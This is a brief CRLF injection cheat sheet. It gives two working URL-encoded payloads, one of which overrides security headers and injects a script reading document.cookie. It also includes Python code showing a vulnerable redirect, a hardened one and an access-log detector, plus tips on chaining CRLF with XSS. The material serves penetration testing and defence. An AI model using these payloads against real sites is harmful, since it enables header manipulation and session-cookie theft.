CRLF Injection
#payloads #injection #headers
Commands
%0d%0a%0d%0a%3Ch1%3ECoffinxp%3C%2Fh1%3E%0A%3Cp%3ECRLF%20Injection%20PoC%3C%2Fh1%3E
Basic payload for testing CRLF injection: the encoded CR/LF pairs (%0d%0a) terminate the response headers, so any extra header lines or HTML that follow are treated as part of the response.
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
Payload that uses CRLF injection to override security headers (here Content-Type and X-XSS-Protection) and then end the header block so a script lands in the response body.
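A defender-side illustration of the behaviour above, added here as an example and not part of the original cheat sheet: a redirect handler that concatenates a caller-supplied value into the Location header, the same handler with CR/LF validation, and a check that flags access-log request targets which percent-decode (once or twice) to CR or LF. The function names and the log lines are constructed for this example.

```python
import re
from urllib.parse import unquote

# RFC 7230: a header field value must not contain a bare CR or LF; either one lets the
# caller end the current header line and write header lines (or a body) of their own.
CRLF_RE = re.compile(r"[\r\n]")
REQ_TARGET_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def redirect_vulnerable(target: str) -> bytes:
    """Redirect built by string concatenation: CR/LF in `target` becomes new header lines."""
    return f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n\r\n".encode("latin-1")

def redirect_hardened(target: str) -> bytes:
    """Same response, but the header value is validated before it is serialised."""
    if CRLF_RE.search(target):
        raise ValueError("CR or LF is not allowed in a header value")
    return f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n\r\n".encode("latin-1")

def parse_headers(raw: bytes) -> list[str]:
    """Return the header lines a client would see (status line excluded)."""
    head = raw.decode("latin-1").partition("\r\n\r\n")[0]
    return head.split("\r\n")[1:]

def flag_crlf_requests(log_lines: list[str]) -> list[str]:
    """Flag request targets that decode to CR or LF (single or double percent-encoding)."""
    hits = []
    for line in log_lines:
        m = REQ_TARGET_RE.search(line)
        if not m:
            continue
        decoded = unquote(unquote(m.group(1)))  # second pass catches %250d%250a
        if CRLF_RE.search(decoded):
            hits.append(m.group(1))
    return hits

# Constructed sample access-log lines (not taken from any real system).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2024:13:55:36 +0000] "GET /redirect?url=/home HTTP/1.1" 302 0',
    '203.0.113.7 - - [10/Oct/2024:13:55:40 +0000] "GET /redirect?url=%0d%0aX-Injected:%201 HTTP/1.1" 302 0',
    '203.0.113.9 - - [10/Oct/2024:13:55:44 +0000] "GET /redirect?url=%250d%250aX-Injected:%201 HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    user_value = unquote("/home%0d%0aX-Injected:%201")  # what the server sees after decoding
    print(parse_headers(redirect_vulnerable(user_value)))  # ['Location: /home', 'X-Injected: 1']
    try:
        redirect_hardened(user_value)
    except ValueError as err:
        print("rejected:", err)
    print(flag_crlf_requests(SAMPLE_LOG))  # the two encoded CR/LF requests
```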
Tips & Best Practices
Always encode your payloads properly to prevent breaking the target's application
Use tools like Burp Suite to inject payloads into headers and parameters effectively
Test various headers and parameters for injection points, as not all inputs are sanitized the same way
Combine CRLF injection with other vulnerabilities (e.g., XSS, open redirect) for more impactful exploitation
Document all testing results carefully, noting which headers or inputs were vulnerable